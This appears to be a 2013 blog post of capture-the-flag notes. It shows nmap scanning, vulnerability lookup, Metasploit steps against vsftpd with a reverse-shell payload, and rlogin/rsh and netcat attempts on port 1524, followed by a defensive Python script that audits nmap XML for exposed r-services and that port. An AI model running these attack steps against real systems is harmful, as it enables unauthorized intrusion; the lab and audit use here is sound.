Friday, June 7, 2013

Capture The Flag notes

Here are some notes for capture the flag:

1. Use BackTrack, because it comes with many attack tools already installed, including Metasploit

2. Use nmap to scan a target host and identify which services (and versions) are running

$ nmap -A -T4 www.hostIP.com
 -A: enable OS detection, version detection, script scanning, and traceroute
 -T4: aggressive timing template, for faster execution
nmap cheatsheet: https://tiw2013.cse.psu.edu/slides/cheat_sheet.pdf

3. Go to the SecurityFocus website, search with the service name and version as the keyword, and find out whether there is a known vulnerability for that service.

SecurityFocus: http://www.securityfocus.com/vulnerabilities
e.g., vsftpd, irc2

4. Open Metasploit to exploit the vulnerability

$ msfconsole
msf > use /unix/vsftpd/exploit-path
msf > set rhost target-IP
msf > exploit

By default Metasploit sets lhost to the current IP and the payload to a reverse shell (only the "use" line and the lines after it are typed at the msf prompt, not the shell prompt).


Additional Tips:
1) try the rlogin and rsh commands
$ rlogin -l username Target-IP
$ rsh -l username Target-IP

2) take a look at port 1524. If it is open, try to log in with netcat
$ nc TargetIP 1524
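The flip side of steps 2 and 3 and the two tips above is the audit you run against your own boxes: scan with nmap, turn the output into a service inventory, and flag anything that should not be listening (the r-services behind rlogin/rsh, an open tcp/1524, or an open port nmap could not identify). The script below is an added example, not from the original post; it parses nmap's XML output (the real -oX flag) using a constructed, abbreviated sample with placeholder version strings, and the port list and finding messages are my own choices.

```python
import xml.etree.ElementTree as ET

# Constructed, abbreviated sample of "nmap -A -T4 -oX scan.xml <host>" output.
# Not from a real scan: documentation address, placeholder version strings.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -T4 -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="0.0-sample"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="0.0-sample"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="closed"/>
        <service name="http"/>
      </port>
      <port protocol="tcp" portid="513">
        <state state="open"/>
        <service name="login"/>
      </port>
      <port protocol="tcp" portid="514">
        <state state="open"/>
        <service name="shell"/>
      </port>
      <port protocol="tcp" portid="1524">
        <state state="open"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Legacy BSD r-services: trust is by hostname/IP and everything is cleartext.
LEGACY_R_SERVICES = {512: "rexec", 513: "rlogin", 514: "rsh"}
# Port the notes above single out; an open listener here needs an owner.
WATCHLIST = {1524: "unexpected listener on tcp/1524"}


def parse_inventory(xml_text):
    """Return one dict per open port: host, proto, port, service, product, version."""
    root = ET.fromstring(xml_text)
    inventory = []
    for host in root.findall("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports do not belong in the inventory
            svc = port.find("service")
            inventory.append({
                "host": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return inventory


def audit(inventory):
    """Return (host, port, reason) for every open port that should not be there."""
    findings = []
    for e in inventory:
        p = e["port"]
        if p in LEGACY_R_SERVICES:
            findings.append((e["host"], p,
                             f"{LEGACY_R_SERVICES[p]} exposed: disable r-services, use ssh"))
        elif p in WATCHLIST:
            findings.append((e["host"], p, WATCHLIST[p]))
        elif e["service"] is None:
            findings.append((e["host"], p, "open port with no identified service"))
    return findings


def lookup_keywords(inventory):
    """'product version' strings to search in a vulnerability database (step 3)."""
    return sorted({f"{e['product']} {e['version'] or ''}".strip()
                   for e in inventory if e["product"]})


if __name__ == "__main__":
    inv = parse_inventory(SAMPLE_NMAP_XML)
    for e in inv:
        print(f"{e['host']} {e['proto']}/{e['port']} {e['service']} "
              f"{e['product'] or ''} {e['version'] or ''}")
    for host, port, reason in audit(inv):
        print(f"FINDING {host}:{port} {reason}")
    print("lookup:", lookup_keywords(inv))
```

Point it at a real file with ET.parse("scan.xml").getroot() instead of the embedded sample; on the sample it reports 513, 514 and 1524 and produces the "vsftpd 0.0-sample" / "OpenSSH 0.0-sample" keywords you would paste into the SecurityFocus search from step 3.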
